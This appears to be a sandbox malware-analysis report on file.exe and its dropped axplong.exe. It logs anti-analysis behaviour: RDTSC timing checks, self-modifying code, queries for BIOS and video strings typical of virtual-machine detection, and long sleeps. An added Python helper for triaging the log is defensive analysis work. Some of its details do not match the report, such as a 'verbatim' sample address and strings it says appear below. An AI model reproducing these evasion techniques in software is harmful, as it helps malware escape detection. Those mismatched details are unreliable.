Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0213 second address: 53A02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050DBh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F84B0B050E6h 0x00000017 test esi, esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e je 00007F8522CD3498h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F84B0B050DEh 0x0000002b xor ax, BD78h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F84B0B050E8h 0x0000003c jmp 00007F84B0B050E5h 0x00000041 popfd 0x00000042 popad 0x00000043 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004a pushad 0x0000004b mov edi, esi 0x0000004d mov edx, eax 0x0000004f popad 0x00000050 je 00007F8522CD344Ah 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A02C2 second address: 53A0307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d jmp 00007F84B0D65607h 0x00000012 or edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F84B0D65605h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390786 second address: 539078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539078C second address: 5390790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390790 second address: 53907D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F84B0B050E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 movsx edi, si 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F84B0B050E2h 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov ecx, edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53907D7 second address: 539083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F84B0D65600h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, 2454h 0x00000015 mov edx, 1F5531C0h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F84B0D655FBh 0x00000025 sub eax, 484172EEh 0x0000002b jmp 00007F84B0D65609h 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539083A second address: 53908FC instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F84B0B050DDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F84B0B050DAh 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F84B0B050E0h 0x00000026 sub ebx, ebx 0x00000028 pushad 0x00000029 call 00007F84B0B050E7h 0x0000002e mov esi, 6EC8DC1Fh 0x00000033 pop esi 0x00000034 movsx edx, cx 0x00000037 popad 0x00000038 test esi, esi 0x0000003a pushad 0x0000003b call 00007F84B0B050DAh 0x00000040 pop edx 0x00000041 pushfd 0x00000042 jmp 00007F84B0B050DEh 0x00000047 sub ecx, 0C7A4CB8h 0x0000004d jmp 00007F84B0B050DBh 0x00000052 popfd 0x00000053 popad 0x00000054 je 00007F8522CDAB8Dh 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov si, dx 0x00000060 call 00007F84B0B050E7h 0x00000065 pop eax 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53908FC second address: 5390902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390902 second address: 5390918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390918 second address: 539091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539091D second address: 5390923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390923 second address: 5390927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390927 second address: 53909BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F84B0B050E6h 0x0000000f je 00007F8522CDAB32h 0x00000015 pushad 0x00000016 mov dl, cl 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E6h 0x0000001f adc ecx, 35E75638h 0x00000025 jmp 00007F84B0B050DBh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test byte ptr [775F6968h], 00000002h 0x00000034 jmp 00007F84B0B050DFh 0x00000039 jne 00007F8522CDAAFAh 0x0000003f pushad 0x00000040 movzx esi, dx 0x00000043 mov ecx, ebx 0x00000045 popad 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F84B0B050E6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53909BA second address: 53909CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D655FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53909CC second address: 53909D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53909D0 second address: 53909DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53909DF second address: 53909E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53909E5 second address: 5390A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F84B0D65605h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A09 second address: 5390A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A0F second address: 5390A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A13 second address: 5390A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F84B0B050E2h 0x00000015 xor si, 3948h 0x0000001a jmp 00007F84B0B050DBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A54 second address: 5390A74 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F84B0D655FEh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A74 second address: 5390A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A78 second address: 5390A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390A7C second address: 5390A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390B2F second address: 5390B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390B43 second address: 5390B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0D16 second address: 53A0D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0D1B second address: 53A0D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0D21 second address: 53A0D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0D25 second address: 53A0D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0B050E8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0D48 second address: 53A0D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F84B0D65606h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D65607h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0AB1 second address: 53A0AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, bh 0x0000000d movzx eax, di 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F84B0B050DBh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54207B2 second address: 54207B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410A32 second address: 5410A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410A49 second address: 5410A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F84B0D65600h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410A8E second address: 5410A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 541086C second address: 5410872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410872 second address: 5410878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410878 second address: 541087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53B0148 second address: 53B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53B014E second address: 53B01AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E2h 0x00000009 or si, 7CB8h 0x0000000e jmp 00007F84B0B050DBh 0x00000013 popfd 0x00000014 jmp 00007F84B0B050E8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 mov esi, 4BC3F7ADh 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov ebx, 2BAE4092h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53B01AF second address: 53B01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53B01B3 second address: 53B01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410C0A second address: 5410C3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 67h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, 72E32E7Fh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410C3A second address: 5410CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov ah, 4Ch 0x0000000f popad 0x00000010 push dword ptr [ebp+08h] 0x00000013 jmp 00007F84B0B050E5h 0x00000018 push 89E7DEA1h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6F500E5Eh 0x00000024 movsx edi, cx 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e adc ch, 00000028h 0x00000031 jmp 00007F84B0B050DBh 0x00000036 popfd 0x00000037 popad 0x00000038 add dword ptr [esp], 76192161h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F84B0B050E5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410CBC second address: 5410CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410D24 second address: 5410D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410D29 second address: 5410D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65602h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 23DA5D second address: 23DA81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a js 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 23DC45 second address: 23DC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 23DC49 second address: 23DC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 23DC4F second address: 23DC7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F84B0D655FBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F84B0D65607h 0x00000014 jmp 00007F84B0D65601h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C0657 second address: 53C065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
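Reading the interceptor lines above by eye is slow because nearly every instruction between the two rdtsc reads is stack juggling (push/pop, pushad/popad, pushfd/popfd) and jumps to the next instruction, the padding a code protector emits around the real work; the report's own memory strings further down (Oreans.vxd, Software\WinLicense) point at such a protector. The following is an added triage helper, not part of the report and not Joe Sandbox code: it parses lines copied verbatim from the report, groups the intercepted pairs by 64 KiB code region, and strips the padding so that the few instructions that compare something or dereference memory (the cmp against DDEEDDEEh, the test of a byte at 775F6968h) stand out. The padding mnemonic list and the "probe" criterion are assumptions chosen for this example.

```python
"""Triage of Joe Sandbox "RDTSC instruction interceptor" lines.

Added example; this is not part of the report and not Joe Sandbox code.
The sandbox logs every pair of consecutive rdtsc reads it intercepts
together with the instructions executed between them.  Under a code
protector most of those instructions are push/pop/pushad/jmp padding, so
the functions below strip that padding and keep only the instructions
that compare something or dereference memory, which is where a timing
check (or whatever else sits between the two reads) actually lives.
The padding mnemonic list and the "probe" criterion are assumptions made
for this example, not anything the report states.
"""
import re
from collections import Counter

# Constructed input: three lines copied verbatim from the report above
# (the extraction fused the path and the signature text; the parser
# accepts that form and the "path | signature" form alike).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0144 second address: 53A0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0213 second address: 53A02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050DBh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F84B0B050E6h 0x00000017 test esi, esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e je 00007F8522CD3498h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F84B0B050DEh 0x0000002b xor ax, BD78h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F84B0B050E8h 0x0000003c jmp 00007F84B0B050E5h 0x00000041 popfd 0x00000042 popad 0x00000043 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004a pushad 0x0000004b mov edi, esi 0x0000004d mov edx, eax 0x0000004f popad 0x00000050 je 00007F8522CD344Ah 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390927 second address: 53909BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F84B0B050E6h 0x0000000f je 00007F8522CDAB32h 0x00000015 pushad 0x00000016 mov dl, cl 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E6h 0x0000001f adc ecx, 35E75638h 0x00000025 jmp 00007F84B0B050DBh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test byte ptr [775F6968h], 00000002h 0x00000034 jmp 00007F84B0B050DFh 0x00000039 jne 00007F8522CDAAFAh 0x0000003f pushad 0x00000040 movzx esi, dx 0x00000043 mov ecx, ebx 0x00000045 popad 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F84B0B050E6h 0x00000050 rdtsc",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.*)$"
)
# Each instruction is "0x<8 hex digit offset> <text>" up to the next offset marker.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.*?)(?=\s+0x[0-9A-Fa-f]{8}\s|\s*$)")

# Assumed padding: stack juggling and unconditional jumps the protector inserts
# around the real work.  rdtsc itself is dropped too; the bracketing pair is implied.
PADDING = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp", "rdtsc"}
COMPARES = {"cmp", "test"}


def parse_line(line):
    """Return a dict for one interceptor line, or None if the line is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    insns = [(int(off, 16), text.strip()) for off, text in INSN_RE.findall(m["body"])]
    return {
        "source": m["src"],
        "first": int(m["first"], 16),
        "second": int(m["second"], 16),
        "instructions": insns,
    }


def parse_report(lines):
    return [rec for rec in map(parse_line, lines) if rec is not None]


def mnemonic(text):
    return text.split()[0].lower()


def strip_padding(record):
    return [text for _, text in record["instructions"] if mnemonic(text) not in PADDING]


def probes(record):
    """Instructions that compare or dereference memory: the likely check."""
    return [
        text
        for text in strip_padding(record)
        if mnemonic(text) in COMPARES or "ptr [" in text
    ]


def regions(records, granularity=0x10000):
    """Count intercepted pairs per aligned code region (64 KiB by default)."""
    return Counter(rec["first"] & ~(granularity - 1) for rec in records)


if __name__ == "__main__":
    recs = parse_report(SAMPLE_LINES)
    for base, n in sorted(regions(recs).items()):
        print(f"region {base:08X}: {n} rdtsc pair(s)")
    for rec in recs:
        gap = rec["second"] - rec["first"]
        print(f"{rec['first']:08X}->{rec['second']:08X} ({gap} bytes, "
              f"{len(rec['instructions'])} insns): {probes(rec) or 'padding only'}")
```

Run it over the whole block of interceptor lines and the regions with the most pairs (53A0xxx, 5390xxx, 5410xxx) are the ones worth opening in a debugger first; a pair whose only non-padding instruction is the pair itself is an obfuscation artefact, not a timing check.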
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7C276 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 2BAAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 46EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 46EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 46C276 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 6AAAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05410BDB rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 1176
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 525
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 1230
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 1189
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 | Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 | Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 | Thread sleep count: 1176 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 | Thread sleep time: -2353176s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 | Thread sleep count: 525 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 | Thread sleep time: -15750000s >= -30000s
